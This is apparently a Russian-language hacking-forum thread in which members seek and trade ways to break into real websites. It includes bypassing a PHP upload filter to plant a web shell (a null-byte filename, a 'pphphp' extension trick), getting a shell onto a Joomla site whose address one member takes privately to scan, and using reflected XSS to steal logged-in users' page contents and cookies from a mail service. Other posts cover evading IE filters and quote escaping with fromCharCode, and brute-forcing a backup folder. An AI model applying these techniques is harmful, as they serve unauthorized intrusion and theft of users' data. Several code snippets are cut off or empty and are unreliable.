$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }

Как можно обойти проверку расширений?

2alexvrn,

врядли обойдешь.

alexvrn said:

Code:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }

Как можно обойти проверку расширений?



Прозреваю, что переменная $cfg['filestype'] может задаваться где-то в конфигах, поэтому если есть возможность ее установить, то пропиши подобное

$cfg['filestype'] = 'jpeg,gif,png,jpg,bmp,zip,rar,pphphp';

и залей shell.php

alexvrn said:

Code:
// проверяем тип файла
$types = $cfg['filestype'] ? $cfg['filestype'] : 'jpeg,gif,png,jpg,bmp,zip,rar,tar';
$types = str_replace('php', '', $types);
$types = str_replace('htm', '', $types);
$types = str_replace('htaccess', '', $types);
$maytypes = explode(',', str_replace(' ', '', $types));
$path_parts = pathinfo($name);
// расширение файла
$ext = strtolower($path_parts['extension']);
// флаг существования расширения в разрешенных
$may = in_array($ext, $maytypes);
if(!$may) { cmsCore::addSessionMessage($_LANG['ERROR_TYPE_FILE'].': '.$types, 'error'); $inCore->redirectBack(); }

Как можно обойти проверку расширений?


Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя:


Code:
test.php%00.jpg



Code:
Array
(
[dirname] => .
[basename] => test.php�.jpg
[extension] => jpg
[filename] => test.php
)

Boolean said:
Если далее действия будут производиться с $path_parts['filename'](что очень маловероятно), то проблем возникнуть не должно используя:

Code:
test.php%00.jpg


Code:
Array
(
[dirname] => .
[basename] => test.php�.jpg
[extension] => jpg
[filename] => test.php
)



При загрузки test.php%00.jpg => test-php-00.jpg

попробуй test.php.php%00.png

Pirotexnik said:
попробуй test.php.php%00.png


test-php-php-00.png

str_replace — Заменяет все вхождения строки поиска на строку замены

alexvrn said:
test-php-php-00.png



ты грузишь %00, а нужно NULL.

P.S. Мой способ попробовал?

попугай said:
ты грузишь %00, а нужно NULL.
P.S. Мой способ попробовал?


Да вообще не грузит

P.S. Можно залить ли шелл в fckeditor 2.6.6 только .htaccess уже есть в папках? magic_quotes_gpc Off

на сайте есть пассивка, можно ли вытащить сурс код странички залогиненого юзера(некий xsrf) и передать/записать на сервер

justonline said:
на сайте есть пассивка, можно ли вытащить сурс код странички залогиненого юзера(некий xsrf) и передать/записать на сервер


Возможности XSRF зависят от установленной системы (cms).

R0nin said:
Возможности XSRF зависят от установленной системы (cms).


самописный. без защиты. да и какая разница, если есть пассивная xss? я с jsом плохо знаком)

justonline said:
самописный. без защиты. да и какая разница, если есть пассивная xss? я с jsом плохо знаком)


Пассивная/активная без разницы, ты должен понимать что javascript работает на стороне клиента. Если самописный движок ты должен будешь изучить его, чтобы провести XSRF. Там нету возможности украсть cookies?

update: точнее - есть ли там вообща аутентификация, и работает ли она на основе cookies?

R0nin said:
Пассивная/активная без разницы, ты должен понимать что javascript работает на стороне клиента. Если самописный движок ты должен будешь изучить его, чтобы провести XSRF. Там нету возможности украсть cookies?
update: точнее - есть ли там вообща аутентификация, и работает ли она на основе cookies?


есть конечно. и есть возможность воровать куки, естественно. только я преследую цель - сбор некоторых данных, а не кража аккаунтов. зачем изучать двиг, если нужно только взять сурс код?

+ я прекрасно знаю, про то, на чьей стороне работает js, именно из-за этого возможно получить страницу залогиненого юзера. Js спокойно работает в пределах атакуемого сайта, если у вас нет ничего по-существу вопроса, давайте не будем офтопить, спасибо.

я преследую не чистый xsrf, а лишь "некое" подобие)

justonline said:
есть конечно. и есть возможность воровать куки, естественно. только я преследую цель - сбор некоторых данных, а не кража аккаунтов. зачем изучать двиг, если нужно только взять сурс код?
+ я прекрасно знаю, про то, на чьей стороне работает js, именно из-за этого возможно получить страницу залогиненого юзера. Js спокойно работает в пределах атакуемого сайта, если у вас нет ничего по-существу вопроса, давайте не будем офтопить, спасибо.
я преследую не чистый xsrf, а лишь "некое" подобие)


Давай не умничай уже. Если тебе нужны сорсы движка, ты должен с помощью XSRF воспользоваться функцией этого движка, для нужных тебе операций, если такие функция вообще существуют. Если ты прекрасно знаешь на чей стороне работает javascript, то ты прекрасно должен знать на чей стороне работает PHP/ASP/PYTHON. Тоже мне умник.

R0nin said:
Давай не умничай уже. Если тебе нужны сорсы движка, ты должен с помощью XSRF воспользоваться функцией этого движка, для нужных тебе операций, если такие функция вообще существуют. Если ты прекрасно знаешь на чей стороне работает javascript, то ты прекрасно должен знать на чей стороне работает PHP/ASP/PYTHON. Тоже мне умник.


друг мой, ты меня очень недооцениваешь. улови логическую связь между "сурс страницы залогиненого юзера" и jsом.

тут ни слова о исходниках движка.


можно ли вытащить сурс код
странички залогиненого
юзера


читайте, пожалста, вникая в текст. а не верхами.

justonline said:
друг мой, ты меня очень недооцениваешь. улови логическую связь между "сурс страницы залогиненого юзера" и jsом.
тут ни слова о исходниках движка.
читайте, пожалста, вникая в текст. а не верхами.


простите ради Бога)

Все думал, что тебе нужны сорсы со сторoны сервера.

В таком случаи советую копать в сторону:


Code:
document.getElementById('id').childNodes;
document.getElementById('id').getElementsByTagNam� �;

Я как понимаю, тебе не будут нужны все сорсы этой страницы, а только определенная часть, поэтому можно воспользоватся javascript.

если я правильно понил, что-то типа того (если на целевом сайте подключен jQuery, впрочем если нет, то через ту же пассивку его можно и подключить):


Code:
$('').insertBefore('div:eq(0)');

justonline said:
на сайте есть пассивка, можно ли вытащить сурс код странички залогиненого юзера(некий xsrf) и передать/записать на сервер


токен пытаешся чтоли вытащить? или полный сурс? Если есть возможность использовать XSS (именно на этой а не на другой странице сайта )то можно, если ксска на другой странице- и у тебя получится вытянуть токен- можеш на нобелевскую подавать (я сам когдато над этой задачей провел ниодну бесонную ночь)

Kusto said:
токен пытаешся чтоли вытащить? или полный сурс? Если есть возможность использовать XSS (именно на этой а не на другой странице сайта )то можно, если ксска на другой странице- и у тебя получится вытянуть токен- можеш на нобелевскую подавать
(я сам когдато над этой задачей провел ниодну бесонную ночь)


не очень понимаю в чем проблема, если та (другая страница) на том же домене, то можно открыть iframe с той страницей и также как выше я указал отправить html-содержимое

Kusto said:
токен пытаешся чтоли вытащить? или полный сурс? Если есть возможность использовать XSS (именно на этой а не на другой странице сайта )то можно, если ксска на другой странице- и у тебя получится вытянуть токен- можеш на нобелевскую подавать
(я сам когдато над этой задачей провел ниодну бесонную ночь)


где-то тут м_скрипт говорил, что если есть пассивка, то токены не спасут) и говорил действовать через xmlrequest

justonline said:
где-то тут м_скрипт говорил, что если есть пассивка, то токены не спасут) и говорил действовать через xmlrequest


Ты все еще не разборался с этим. Тебе что именно нужно будет вытащить, все сорсы или токены, или какие нибудь другие определенные элементы?

Да кстати, M_script прав, токены не спасут от пассивки, если атакующий знает с каким названием токен находится в документе.

Вопрос номер раз:

Есть ли где подробное описание, как использовать post xss (никак не могу разобраться... есть пассивка на почтовике, где в строке поиска нужно ввести скрипт и нажать enter - как на практике ей угнать кукисы?)

Вопрос номер два как можно зaлить шелл (сайт на джyмлe 1.7)? Jskу нашел там вот что:


Code:
Possible secsitive directories - 1125
Directories with EXECUTE permission enabled - 17
Possible sensitive files - 15
Directory backup check - 16
File backup check - 274

R0nin said:
Ты все еще не разборался с этим. Тебе что именно нужно будет вытащить, все сорсы или токены, или какие нибудь другие определенные элементы?
Да кстати, M_script прав, токены не спасут от пассивки, если атакующий знает с каким названием токен находится в документе.


не было времени) спал я)

а счас в универе

Code:






как-нибудь так


Вопрос номер два как можно зaлить шелл (сайт на джyмлe 1.7)? Jskу нашел там вот что:


ты хотя бы перевел, что он там нашел?

faza02 said:

Code:






как-нибудь так


Попробую


ты хотя бы перевел, что он там нашел?


Я сам не особо понимаю, он весь на английском, Possible secsitive directories насколько я понимаю "Возможно открытая директория"

нужно понимание того, что выдает тебе сканер, чтобы потом спрашивать «а можно…»

http://translate.google.ru/

faza02 said:
нужно понимание того, что выдает тебе сканер, чтобы потом спрашивать «а можно…»
http://translate.google.ru/


Технический перевод


HTML:
Возможные secsitive каталоги - 1125
Каталоги с поддержкой разрешения на выполнение - 17
Возможны важные файлы - 15
Каталог резервной проверки - 16
Файл резервной проверки - 274

Просто я полагаю в джумлe есть какие-то более-менее универсальные уязвимости?

/thread50600.html

faza02 said:
/thread50600.html


Да, я там многие вещи пробовал, но ничего особо не получилось. Там для специальных компонентов джумлы, а я понятия не имею какие на том сайте есть компоненты.

кто ж тебе открыть сайт мешает и полистать?

faza02 said:
кто ж тебе открыть сайт мешает и полистать?


Листаю, там в коде есть только component/mailto

и несколько users-components (remind pass итп)

Как-то еще можно проверить, какие компоненты там есть? Сайт довольно простой, не думаю что какие-то модули сверх навороченые туда ставились

jacklndn said:
Листаю, там в коде есть только component/mailto
и несколько users-components (remind pass итп)
Как-то еще можно проверить, какие компоненты там есть? Сайт довольно простой, не думаю что какие-то модули сверх навороченые туда ставились


скинь адрес сайта

R0nin said:
скинь адрес сайта


в личку скинул

jacklndn said:
в личку скинул


Из 68 компонент только компонент Content (com_content) найден. База данных сканера небольшая, надо будет потом обновить его.

update: + com_users

R0nin said:
Из 68 компонент только компонент Content (com_content) найден. База данных сканера небольшая, надо будет потом обновить его.
update: +
com_users


Все облазил, но ничего так и не нашел что помогло бы залить шелл.

Еще отдельный вопрос о xss пассивке для почтовика.

post xss не хочет работать, однако добрый человек подсказал как вывести ее в get параметр. Но теперь она отказывается работать в ie и хроме. Если хром, это не фатально, то вот с ие очень хотелось чтобы xss работала. Есть ли варианты обойти фильтры ие?

jacklndn said:
Все облазил, но ничего так и не нашел что помогло бы залить шелл.
Еще отдельный вопрос о xss пассивке для почтовика.
post xss не хочет работать, однако добрый человек подсказал как вывести ее в get параметр. Но теперь она отказывается работать в ie и хроме. Если хром, это не фатально, то вот с ие очень хотелось чтобы xss работала. Есть ли варианты обойти фильтры ие?


Такая вот она жизнь мужик, приходится всякие фильтры обходить)

jacklndn said:
в личку скинул


линку в личку

пытаюсь намутить активную xss на одном сайте. текст сообщения пишется в js скрипт. ковычки " экранируются слешем. есть варианты обхода?

justonline said:
пытаюсь намутить активную xss на одном сайте. текст сообщения пишется в js скрипт. ковычки " экранируются слешем. есть варианты обхода?


Если JS пропускается то кавычки не нужны, потому что есть волшебный метод fromCharCode() объекта String.


Code:
document.write(String.fromCharCode(65,66,67,68));

Результат будет: ABCD

Есть на одном сайтике папка backup не закрытая.

Не подскажите как могут храниться бекапы? Ничего на эту тему в гугле не нашел.

JorryGo, не факт что в ней может что-то лежать.

а бэкап от какого-нибудь движка, типа булки, то просто заебешься брутить.

ну а так dirbuster-ом на брут поставь папку